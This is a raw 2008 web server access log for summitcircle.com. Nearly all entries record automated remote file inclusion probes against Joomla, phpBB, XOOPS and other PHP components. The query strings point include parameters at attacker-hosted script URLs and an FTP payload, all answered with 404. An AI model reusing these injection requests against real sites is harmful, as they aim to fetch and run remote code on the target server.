209.104.6.82 - - [30/Jun/2008:05:31:31 -0700] "GET //update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:31 -0700] "GET /logs//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.96.130 - - [30/Jun/2008:05:31:32 -0700] "GET /logs/access_080303.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:31:52 -0700] "GET /logs/access_080303.log//update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:32:23 -0700] "GET /logs/access_080303.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:32:27 -0700] "GET /logs/access_080303.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:32:37 -0700] "GET /logs/access_080303.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:32:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:32:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:33:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:33:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.63.101.163 - - [30/Jun/2008:05:33:03 -0700] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.63.101.163 - - [30/Jun/2008:05:33:06 -0700] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:33:27 -0700] "GET /logs/access_080526.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:33:27 -0700] "GET //update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:33:27 -0700] "GET /logs//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
212.227.251.172 - - [30/Jun/2008:05:33:43 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:33:51 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:33:51 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:33:52 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:33:53 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:33:57 -0700] "GET //templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:33:58 -0700] "GET /logs/access_080406.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:33:58 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:33:58 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:33:58 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:34:13 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:34:13 -0700] "GET //templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:34:14 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:15 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:15 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:15 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:34:15 -0700] "GET /logs/access_071231.log//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:34:15 -0700] "GET //templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
72.29.92.223 - - [30/Jun/2008:05:34:16 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
218.239.223.69 - - [30/Jun/2008:05:34:20 -0700] "GET /logs/access.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.vanderjagt-kraanverhuur.nl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:29 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:29 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:30 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.104.6.82 - - [30/Jun/2008:05:34:31 -0700] "GET /logs/access_080303.log//update/update2.php?lang=http://www.westminsterakron.com//templates/.../bp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:34:47 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.221.130.15 - - [30/Jun/2008:05:36:45 -0700] "GET /logs/access_071029.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
211.171.255.102 - - [30/Jun/2008:05:37:08 -0700] "GET /logs/access_071001.log//modules/vwar/admin/admin.php?vwar_root=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:37:43 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.98.71 - - [30/Jun/2008:05:38:30 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.98.71 - - [30/Jun/2008:05:38:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.221.130.15 - - [30/Jun/2008:05:39:17 -0700] "GET /logs/access_071015.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:05:39:27 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:05:39:28 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:05:39:28 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:39:47 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:39:47 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
86.59.35.146 - - [30/Jun/2008:05:40:19 -0700] "GET //contenido/classes/class.inuse.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xisonex/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.summitcircle.com"
86.59.35.146 - - [30/Jun/2008:05:40:19 -0700] "GET /logs//contenido/classes/class.inuse.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xisonex/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:05:40:23 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:05:40:30 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.14.1.101 - - [30/Jun/2008:05:40:30 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://perevorot.org/cache/tits.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:42:19 -0700] "GET /logs/access_071022.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:42:19 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.62.24.242 - - [30/Jun/2008:05:42:19 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.metal-headz.co.uk/modules/Sexy_or_Not/pictures/4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:05:43:46 -0700] "GET /logs/access_080127.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:05:43:46 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:05:43:46 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:44:22 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:44:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:44:22 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.84.164.38 - - [30/Jun/2008:05:44:37 -0700] "GET /logs/access.log//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
70.84.164.38 - - [30/Jun/2008:05:44:37 -0700] "GET //index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
70.84.164.38 - - [30/Jun/2008:05:44:37 -0700] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
82.194.70.164 - - [30/Jun/2008:05:44:38 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.87.105 - - [30/Jun/2008:05:44:55 -0700] "GET /logs/access_080114.log/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://fightersoft.ro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
219.94.129.31 - - [30/Jun/2008:05:45:06 -0700] "GET /logs/access_080127.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.94.129.31 - - [30/Jun/2008:05:45:06 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.94.129.31 - - [30/Jun/2008:05:45:07 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:45:40 -0700] "GET /logs/access_070820.log/link.php?do=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:45:40 -0700] "GET /link.php?do=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:45:41 -0700] "GET /logs/link.php?do=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
78.46.70.228 - - [30/Jun/2008:05:46:19 -0700] "GET /logs/access_080526.log//update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.46.70.228 - - [30/Jun/2008:05:46:19 -0700] "GET //update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.46.70.228 - - [30/Jun/2008:05:46:20 -0700] "GET /logs//update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.58.164.77 - - [30/Jun/2008:05:46:56 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.58.164.77 - - [30/Jun/2008:05:46:56 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.58.164.77 - - [30/Jun/2008:05:46:56 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:47:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.228.115.66 - - [30/Jun/2008:05:47:11 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.94.129.31 - - [30/Jun/2008:05:47:38 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.101.24 - - [30/Jun/2008:05:47:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:05:47:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.101.24 - - [30/Jun/2008:05:47:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.57.1.181 - - [30/Jun/2008:05:47:45 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.58.164.77 - - [30/Jun/2008:05:48:04 -0700] "GET /logs/access_080121.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
193.202.88.113 - - [30/Jun/2008:05:48:15 -0700] "GET /logs/access_080121.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:48:16 -0700] "GET /logs/access_071224.log/link.php?do=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
78.46.70.228 - - [30/Jun/2008:05:49:00 -0700] "GET /logs/access_080303.log//update/update2.php?lang=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.55.206.49 - - [30/Jun/2008:05:49:26 -0700] "GET /logs/access_071224.log//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.55.206.49 - - [30/Jun/2008:05:49:27 -0700] "GET //templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.55.206.49 - - [30/Jun/2008:05:49:28 -0700] "GET /logs//templates/default/header.inc.php?menu=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:50:23 -0700] "GET /logs/access_070916.log/nav.php?go=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:50:24 -0700] "GET /nav.php?go=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.230.35.101 - - [30/Jun/2008:05:50:24 -0700] "GET /logs/nav.php?go=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.180.122.10 - - [30/Jun/2008:05:50:57 -0700] "HEAD / HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2h" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:05:51:26 -0700] "GET /logs/access_071029.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:05:51:26 -0700] "GET /logs/access_071029.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:51:26 -0700] "GET /logs/access_080324.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:51:27 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.101.237 - - [30/Jun/2008:05:51:27 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:05:51:34 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:05:51:34 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:05:51:43 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.105.33.158 - - [30/Jun/2008:05:51:43 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:51:59 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:52:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.255.236.6 - - [30/Jun/2008:05:52:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.94.129.31 - - [30/Jun/2008:05:52:11 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
